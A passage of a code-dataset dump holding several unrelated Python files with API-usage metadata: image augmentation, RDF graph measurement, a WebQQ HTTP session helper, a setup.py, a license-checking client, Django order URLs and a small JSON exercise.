"line_number": 82, "usage_type": "attribute"}, {"api_name": "pyautogui.press", "line_number": 101, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 104, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 107, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "36095088494", "text": "import cv2\nimport numpy as np\nimport os\nimport xml.etree.ElementTree as ET\n\nfrom config import img_path_color_transform, img_path_color_transformed, class_color_transform_mode, clahe_img_ksize, brightness_diff\n\ndef hisColor_Img(org_path,dir_path):\n img = cv2.imread(org_path,cv2.CV_8UC1)\n img_eq = cv2.equalizeHist(img)\n cv2.imwrite(dir_path,img_eq);\n pass\n\ndef clahe_Img(org_path,dir_path,ksize):\n image = cv2.imread(org_path, cv2.IMREAD_COLOR)\n b, g, r = cv2.split(image)\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(ksize,ksize))\n b = clahe.apply(b)\n g = clahe.apply(g)\n r = clahe.apply(r)\n image = cv2.merge([b, g, r])\n cv2.imwrite(dir_path,image);\n\ndef brightness_Img(org_path,dir_path,brightness):\n img = cv2.imread(org_path)\n imgHeight,imgWidth,imgDeep = img.shape\n trans_img = np.zeros((imgHeight, imgWidth, 1), np.uint8)\n for i in range(0, imgHeight):\n for j in range(0, imgWidth):\n a,b,intensity = map(int,img[i,j])\n intensity += brightness\n if intensity > 255:\n intensity = 255\n trans_img[i, j] = intensity\n cv2.imwrite(dir_path,trans_img);\n\ndef write_label(anno_path,anno_write_path):\n tree = ET.parse(anno_path)\n tree.write(anno_write_path)\n\ndef color_transform(classname,img_dir,anno_dir,img_write_dir,anno_write_dir):\n if not os.path.exists(img_write_dir):\n os.makedirs(img_write_dir)\n\n if not os.path.exists(anno_write_dir):\n os.makedirs(anno_write_dir)\n img_names=os.listdir(img_dir)\n for img_name in img_names:\n if img_name.endswith('.png'):\n if(class_color_transform_mode[classname][0] == True):\n img_path=os.path.join(img_dir,img_name)\n img_write_path=os.path.join(img_write_dir,img_name[:-4]+'hiscolor'+'.png')\n anno_path=os.path.join(anno_dir,img_name[:-4]+'.xml')\n anno_write_path = os.path.join(anno_write_dir, img_name[:-4]+'hiscolor'+'.xml')\n hisColor_Img(img_path,img_write_path)\n write_label(anno_path,anno_write_path)\n\n if(class_color_transform_mode[classname][1] == True):\n img_path=os.path.join(img_dir,img_name)\n img_write_path=os.path.join(img_write_dir,img_name[:-4]+'clahe'+'.png')\n anno_path=os.path.join(anno_dir,img_name[:-4]+'.xml')\n anno_write_path = os.path.join(anno_write_dir, img_name[:-4]+'clahe'+'.xml')\n clahe_Img(img_path,img_write_path,clahe_img_ksize)\n write_label(anno_path,anno_write_path)\n\n if(class_color_transform_mode[classname][2] == True):\n img_path=os.path.join(img_dir,img_name)\n img_write_path=os.path.join(img_write_dir,img_name[:-4]+'brightness'+'.png')\n anno_path=os.path.join(anno_dir,img_name[:-4]+'.xml')\n anno_write_path = os.path.join(anno_write_dir, img_name[:-4]+'brightness'+'.xml')\n brightness_Img(img_path,img_write_path,brightness_diff)\n write_label(anno_path,anno_write_path)\n\nif __name__ == \"__main__\":\n if not os.path.exists(img_path_color_transformed):\n os.mkdir(img_path_color_transformed)\n for classname in class_color_transform_mode.keys():\n if not os.path.exists(os.path.join(img_path_color_transform,classname)):\n print(\"no\",classname,\"file in the path,check next class\")\n continue\n if not os.path.exists(os.path.join(img_path_color_transformed,classname)):\n os.mkdir(os.path.join(img_path_color_transformed,classname))\n print(\"working on\",classname)\n color_transform(classname,img_path_color_transform + '/' + classname, img_path_color_transform + '/' + classname, img_path_color_transformed + '/' + classname, img_path_color_transformed + '/' + classname)\n pass\n\n", "repo_name": "ft1148137/deepLearingDataWork", "sub_path": "data_work/color_transform.py", "file_name": "color_transform.py", "file_ext": "py", "file_size_in_byte": 3898, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.CV_8UC1", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.equalizeHist", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.createCLAHE", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 35, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 38, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 38, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 47, "usage_type": "call"}, {"api_name": "config.class_color_transform_mode", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "config.class_color_transform_mode", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "config.clahe_img_ksize", "line_number": 63, "usage_type": "argument"}, {"api_name": "config.class_color_transform_mode", "line_number": 66, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "config.brightness_diff", "line_number": 71, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 75, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 75, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 76, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 76, "usage_type": "argument"}, {"api_name": "config.class_color_transform_mode.keys", "line_number": 77, "usage_type": "call"}, {"api_name": "config.class_color_transform_mode", "line_number": 77, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "config.img_path_color_transform", "line_number": 78, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 81, "usage_type": "argument"}, {"api_name": "os.mkdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 82, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "config.img_path_color_transform", "line_number": 84, "usage_type": "name"}, {"api_name": "config.img_path_color_transformed", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "16751637260", "text": "from collections import defaultdict\nimport typing\n\nimport pandas as pd # type: ignore # pylint: disable=E0401\nimport rdflib # type: ignore # pylint: disable=E0401\n\nfrom .kglab import KnowledgeGraph\nfrom .pkg_types import Census_Item, Census_Dyad_Tally\n\n\nclass Simplex0:\n \"\"\"\nCount the distribution of a class of items in an RDF graph.\nIn other words, tally an \"item census\" – to be consistent with the usage of that term.\n \"\"\"\n\n def __init__ (\n self,\n name: str = \"generic\",\n ) -> None:\n \"\"\"\nConstructor for an item census.\n\n name:\noptional name for this measure\n \"\"\"\n self.name = name\n self.count: dict = defaultdict(int)\n self.df = None\n\n\n def increment (\n self,\n item0: Census_Item,\n ) -> None:\n \"\"\"\nIncrement the count for this item.\n\n item0:\nan item (domain: node, predicate, label, URL, literal, etc.) to be counted\n \"\"\"\n self.count[item0] += 1\n\n\n def get_tally (\n self\n ) -> typing.Optional[pd.DataFrame]:\n \"\"\"\nAccessor for the item counts.\n\n returns:\na [`pandas.DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) with the count distribution, sorted in ascending order\n \"\"\"\n self.df = pd.DataFrame.from_dict(\n self.count,\n orient=\"index\",\n columns=[\"count\"],\n ).sort_values(\"count\", ascending=False)\n return self.df\n\n\n def get_keyset (\n self\n ) -> set:\n \"\"\"\nAccessor for the set of items (domain) counted.\n\n returns:\nset of keys for the items (domain: nodes, predicates, labels, URLs, literals, etc.) that were counted\n \"\"\"\n return { key.toPython() for key in self.count.keys() }\n\n\nclass Simplex1 (Simplex0):\n \"\"\"\nMeasure a dyad census in an RDF graph, i.e., count the relations (directed edges) which connect two nodes.\n \"\"\"\n\n def __init__ (\n self,\n name: str = \"generic\",\n ) -> None:\n \"\"\"\nConstructor for a dyad census.\n\n name:\noptional name for this measure\n \"\"\"\n super().__init__(name=name) # type: ignore\n self.link_map: typing.Optional[dict] = None\n\n\n def increment ( # type: ignore # pylint: disable=W0221 # lgtm[py/inheritance/signature-mismatch]\n self,\n item0: Census_Item,\n item1: Census_Item,\n ) -> None:\n \"\"\"\nIncrement the count for a dyad represented by the two given items.\n\n item0:\n\"source\" item (domain: node, label, URL, etc.) to be counted\n\n item1:\n\"sink\" item (range: node, label, literal, URL, etc.) to be counted\n \"\"\"\n link = (item0, item1,)\n self.count[link] += 1\n\n\n def get_tally_map (\n self\n ) -> Census_Dyad_Tally:\n \"\"\"\nAccessor for the dyads census.\n\n returns:\na tuple of a [`pandas.DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) with the count distribution, sorted in ascending order; and a map of the observed links between \"source\" and \"sink\" items\n \"\"\"\n super().get_tally()\n self.link_map = defaultdict(set)\n\n for index, _ in self.df.iterrows(): # type: ignore\n item0, item1 = index\n self.link_map[item0].add(item1)\n\n return self.df, self.link_map\n\n\nclass Measure:\n \"\"\"\nThis class measures an RDF graph.\nIts downstream use cases include: graph size estimates; computation costs; constructed shapes.\nSee <https://derwen.ai/docs/kgl/concepts/#measure>\n\nCore feature areas include:\n\n * descriptive statistics\n * topological analysis\n \"\"\"\n\n def __init__ (\n self,\n *,\n name: str = \"generic\",\n ) -> None:\n \"\"\"\nConstructor for this graph measure.\n\n name:\noptional name for this measure\n \"\"\"\n self.name = name\n self.edge_count = 0\n self.node_count = 0\n self.reset()\n\n\n def reset (\n self\n ) -> None:\n \"\"\"\nReset (reinitialize) all of the counts for different kinds of census, which include:\n\n * total nodes\n * total edges\n * count for each kind of *subject* (`Simplex0`)\n * count for each kind of *predicate* (`Simplex0`)\n * count for each kind of *object* (`Simplex0`)\n * count for each kind of *literal* (`Simplex0`)\n * item census (`Simplex1`)\n * dyad census (`Simplex1`)\n \"\"\"\n self.edge_count = 0\n self.node_count = 0\n self.s_gen = Simplex0(\"subject\")\n self.p_gen = Simplex0(\"predicate\")\n self.o_gen = Simplex0(\"object\")\n self.l_gen = Simplex0(\"literal\")\n self.n_gen = Simplex1(\"node\")\n self.e_gen = Simplex1(\"edge\")\n\n\n def get_node_count (\n self\n ) -> int:\n \"\"\"\nAccessor for the node count.\n\n returns:\nvalue of `node_count`\n \"\"\"\n return self.node_count\n\n\n def get_edge_count (\n self\n ) -> int:\n \"\"\"\nAccessor for the edge count.\n\n returns:\nvalue of `edge_count`\n \"\"\"\n return self.edge_count\n\n\n def measure_graph (\n self,\n kg: KnowledgeGraph,\n ) -> None:\n \"\"\"\nRun a full measure of the given RDF graph.\n\n kg:\n`KnowledgeGraph` object representing the RDF graph to be measured\n \"\"\"\n for s, p, o in kg.rdf_graph():\n self.edge_count += 1\n self.s_gen.increment(s)\n self.p_gen.increment(p)\n self.n_gen.increment(s, p)\n\n if isinstance(o, rdflib.term.Literal):\n self.l_gen.increment(o)\n else:\n self.o_gen.increment(o)\n self.e_gen.increment(p, o)\n\n self.node_count = len(set(self.s_gen.count.keys()).union(set(self.o_gen.count.keys())))\n\n\n def get_keyset (\n self,\n *,\n incl_pred: bool = True,\n ) -> typing.List[str]:\n \"\"\"\nAccessor for the set of items (domain: nodes, predicates, labels, URLs, literals, etc.) that were measured.\nUsed for *label encoding* in the transform between an RDF graph and a matrix or tensor representation.\n\n incl_pred:\nflag to include the predicates in the set of keys to be encoded\n\n returns:\nsorted list of keys to be used in the encoding\n \"\"\"\n keys = self.s_gen.get_keyset().union(self.o_gen.get_keyset())\n\n if incl_pred:\n keys = keys.union(self.p_gen.get_keyset())\n\n return sorted(list(keys))\n", "repo_name": "DerwenAI/kglab", "sub_path": "kglab/topo.py", "file_name": "topo.py", "file_ext": "py", "file_size_in_byte": 6413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 520, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 28, "usage_type": "call"}, {"api_name": "pkg_types.Census_Item", "line_number": 34, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pkg_types.Census_Item", "line_number": 95, "usage_type": "name"}, {"api_name": "pkg_types.Census_Item", "line_number": 96, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 121, "usage_type": "call"}, {"api_name": "pkg_types.Census_Dyad_Tally", "line_number": 113, "usage_type": "name"}, {"api_name": "kglab.KnowledgeGraph", "line_number": 210, "usage_type": "name"}, {"api_name": "rdflib.term", "line_number": 224, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 237, "usage_type": "attribute"}]} +{"seq_id": "43384466456", "text": "# -*- coding: utf-8 -*-\nimport requests\nimport pickle\nfrom cookielib import LWPCookieJar\nclass HttpRequests:\n def __init__(self,isLoadCookie=False):\n self.req=requests.session()\n self.cookieFileName=\"cookieJar\"\n if isLoadCookie :\n self.__loadCookie()\n self.req.headers['referer']='http://d.web2.qq.com/proxy.html?v=20030916001&callback=1&id=2'\n self.req.headers['Accept']= 'application/javascript, */*;q=0.8';\n self.req.headers['User-Agent']=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36\";\n def __addHeaders(self,headers):\n for k in headers:\n self.req.headers[k]=headers[k]\n pass\n def __saveCookies(self):\n with open(self.cookieFileName, 'w') as f:\n pickle.dump(requests.utils.dict_from_cookiejar(self.req.cookies), f)\n def __loadCookie(self):\n with open(self.cookieFileName) as f:\n cookies = requests.utils.cookiejar_from_dict(pickle.load(f))\n self.req.cookies=cookies\n def get(self,url,headers=None):\n if headers:\n self.__addHeaders(headers)\n ret=self.req.get(url).text\n self.__saveCookies()\n return ret\n def post(self,url,data,headers=None,getCookie=None):\n if headers:\n self.__addHeaders(headers)\n ret=self.req.post(url,data=data).text\n self.__saveCookies()\n return ret\n pass\n def getCookies(self):\n return self.req.cookies\n def downloadFile(self,url,fileName):\n output = open(fileName, 'wb')\n output.write(self.req.get(url).content)\n output.close()\n\n\n\n\n", "repo_name": "lvxinwei/WEBQQ", "sub_path": "HttpRequests.py", "file_name": "HttpRequests.py", "file_ext": "py", "file_size_in_byte": 1702, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.session", "line_number": 7, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.utils.dict_from_cookiejar", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 20, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "1249527896", "text": "\"\"\"\nmdplifs\nTool to calculate protein-ligand interaction fingerprints from molecular dynamics trajectories.\n\"\"\"\nfrom setuptools import setup\nimport versioneer\n\nshort_description = __doc__.split(\"\\n\")\n\ntry:\n with open(\"README.md\", \"r\") as handle:\n long_description = handle.read()\nexcept:\n long_description = \"\\n\".join(short_description[2:]),\n\n\nsetup(\n # Self-descriptive entries which should always be present\n name='mdplifs',\n author='David W. Wright',\n author_email='dave.william.wright@gmail.com',\n description=short_description[0],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n license='MIT',\n\n # Which Python importable modules should be included when your package is installed\n packages=['mdplifs', \"mdplifs.tests\"],\n\n # Optional include package data to ship with your package\n # Comment out this line to prevent the files from being packaged with your software\n # Extend/modify the list to include/exclude other items as need be\n package_data={'mdplifs': [\"data/*.dat\"]\n },\n\n # Additional entries you may want simply uncomment the lines you want and fill in the data\n # url='http://www.my_package.com', # Website\n # install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment\n # platforms=['Linux',\n # 'Mac OS-X',\n # 'Unix',\n # 'Windows'], # Valid platforms your code works on, adjust to your flavor\n python_requires=\">=3.5\", # Python version restrictions\n\n # Manual control if final package is compressible or not, set False to prevent the .egg from being made\n # zip_safe=False,\n\n # Make command line script available\n entry_points={'console_scripts': ['mdplifs = mdplifs.cli:main']},\n)\n", "repo_name": "dww100/mdplifs", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "versioneer.get_version", "line_number": 25, "usage_type": "call"}, {"api_name": "versioneer.get_cmdclass", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "22806644516", "text": "import json\nfrom base64 import b64decode\n\nfrom datetime import date, timedelta, datetime\nfrom urllib.request import urlopen, URLError\nimport requests\nimport os\n\nURL_API = 'http://localhost:1915'\n\nPAGE_GET_TIME = 'http://just-the-time.appspot.com/'\n# LICENSE = KEYGEN + DATA_EXPIRED (KEYGEN == rsa)\nHEADERS = {\n 'Content-Type': 'application/json'\n}\nimport sys\n\nclass LICENSE_CLIENT:\n\n def __init__(self):\n\n self.license_backup = os.path.join(os.path.dirname(__file__), \"license_backup/license.txt\")\n def activeLicense(self, license):\n \"\"\"\n Kich hoat license\n :param license:\n :return:\n \"\"\"\n # res = self.db.findLicenseAndUpdate(license)\n # return res\n data = {\"license\": license}\n url = URL_API + '/check_license'\n try:\n result = requests.post(url, json=data, headers=HEADERS)\n if result.ok:\n self.save_license(license)\n print(result.json())\n result_active = result.json()['result']\n return result_active\n else:\n result.raise_for_status()\n return False\n except Exception as error:\n print(error)\n return False\n\n def get_key_and_date_from_license(self, license):\n \"\"\"\n\n :param license:\n :return: keygen and data_expired\n \"\"\"\n keygen, date_expired = license[:-11], license[-11:]\n keygen = keygen + \"==\"\n date_expired = date_expired + \"=\"\n return keygen, date_expired\n\n def check_expired(self, license):\n \"\"\"\n Internet Environment\n :param license:\n :return: False if not expired, True if expired / not internet\n \"\"\"\n\n if not self.check_have_internet():\n print(\"Not internet\")\n return True\n\n keygen, date_expired = self.get_key_and_date_from_license(license)\n\n # DECODE date_expired\n # prevent user edit license.txt\n try:\n date_expired_byte = date_expired.encode('ascii')\n date_expired_decode = b64decode(date_expired_byte) # bytes\n print(date_expired_decode)\n date_expired = datetime.strptime(date_expired_decode.decode('ascii'), '%Y%m%d').date()\n except Exception as err:\n print(err)\n return False\n if self.check_have_internet():\n date_now = self.get_time_online()\n else:\n date_now = date.today()\n print(date_expired)\n if date_now > date_expired:\n print(\"Expired license\")\n return True\n else:\n print(\"Not expired license\")\n return False\n\n def get_time_online(self):\n \"\"\"\n\n :return: date object\n \"\"\"\n page_time = urlopen(PAGE_GET_TIME)\n time_now = page_time.read().strip()\n date_now = datetime.strptime(time_now.decode('utf-8'), '%Y-%m-%d %H:%M:%S').date()\n return date_now\n\n def check_have_internet(self):\n try:\n urlopen('http://216.58.192.142', timeout=1)\n return True\n except URLError as err:\n return False\n\n def save_license(self, license):\n with open(self.license_backup, 'w') as f:\n f.write(license)\n\n def load_license(self):\n if not os.path.exists(self.license_backup):\n return \"\"\n with open(self.license_backup, 'r') as f:\n license = f.read().strip()\n\n return license\n\n def check_license_valid(self, license):\n pass\n\n\n\nif __name__ == \"__main__\":\n\n license = \"Cg0QrcO8nIDU0ETsC1Bbo5G+NHhwZ0qlA4p2ioeu+zBoOucBEIWk4yRn+wudKJanRY3D5dLHGmXJmj0xFHxWNwMjAyMDA5MTc\"\n lis_client = LICENSE_CLIENT()\n\n #print(lis_client.activeLicense(license))\n license = lis_client.load_license()\n print(lis_client.check_expired(license))", "repo_name": "henryle97/License-Project", "sub_path": "client/license_client.py", "file_name": "license_client.py", "file_ext": "py", "file_size_in_byte": 3885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 84, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 105, "usage_type": "call"}, {"api_name": "urllib.request.URLError", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}]} +{"seq_id": "70144662566", "text": "from django.urls import path\n\nfrom apps.order.api_endpoints import (\n GetDeliveryOrderPriceAPIView,\n GetOrderPriceAPIView,\n OrderAcceptView,\n OrderCancelView,\n OrderCreateView,\n OrderDetailView,\n OrderListView,\n PromocodeRetrieveView,\n UserOrderCancelView,\n UserOrderListView,\n)\n\n\nurlpatterns = [\n path(\"\", OrderListView.as_view(), name=\"order-list\"),\n path(\"user-order-list/\", UserOrderListView.as_view(), name=\"user-order-list\"),\n path(\"create/\", OrderCreateView.as_view(), name=\"order-create\"),\n path(\"accept/\", OrderAcceptView.as_view(), name=\"order-accept\"),\n path(\"cancel/\", OrderCancelView.as_view(), name=\"order-cancel\"),\n path(\"user-cancel/\", UserOrderCancelView.as_view(), name=\"user-order-cancel\"),\n path(\"<int:pk>/\", OrderDetailView.as_view(), name=\"order-detail\"),\n path(\"promocode/<str:code>/\", PromocodeRetrieveView.as_view(), name=\"promocode-retrieve\"),\n path(\"get-price/\", GetOrderPriceAPIView.as_view(), name=\"order-get-price\"),\n path(\"get-delivery-price/\", GetDeliveryOrderPriceAPIView.as_view(), name=\"order-get-price-delivery\"),\n]\n", "repo_name": "khodjiyev2o/tranzit.uz", "sub_path": "apps/order/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1112, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderListView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderListView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderListView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderListView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCreateView.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCreateView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderAcceptView.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderAcceptView", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCancelView.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCancelView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderCancelView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderCancelView", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderDetailView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderDetailView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.PromocodeRetrieveView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.PromocodeRetrieveView", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetOrderPriceAPIView.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetOrderPriceAPIView", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetDeliveryOrderPriceAPIView.as_view", "line_number": 27, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetDeliveryOrderPriceAPIView", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "4307414815", "text": "import json\n\ndef get_stored_number():\n \"\"\"Eğer sayı varsa onu getir.\"\"\"\n filename = 'veriyi_saklamak\\\\uygulama\\\\jsons\\\\kullanici_verisi.json'\n try:\n with open(filename) as f:\n fav_number = json.load(f)\n except FileNotFoundError:\n return None\n else:\n return fav_number\n \ndef get_new_number():\n \"\"\"Yeni sayı sor.\"\"\"\n filename = 'veriyi_saklamak\\\\uygulama\\\\jsons\\\\kullanici_verisi.json'\n fav_number = input(\"What is your favourite number? \")\n with open(filename, 'w') as f:\n json.dump(fav_number, f)\n\ndef greet_user():\n \"\"\"kullanıcıyı selamla.\"\"\"\n fav_number = get_stored_number()\n if fav_number:\n print(\"ı know your favourite number! It's \" + str(fav_number) + \".\")\n else:\n fav_number = get_new_number()\n print(\"oookey that is your fav number, \" + str(fav_number) + \"!\")\n\ngreet_user()", "repo_name": "Yusufygc/PythonCalismalari", "sub_path": "Dosya_islemleri_ve_ozel_durumlar/veriyi_saklamak/uygulama/uygulama_okuma_ve_yazma.py", "file_name": "uygulama_okuma_ve_yazma.py", "file_ext": "py", "file_size_in_byte": 891, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "72845065766", "text": "import logging\nimport os\nimport sys\n\nimport geonode\nfrom 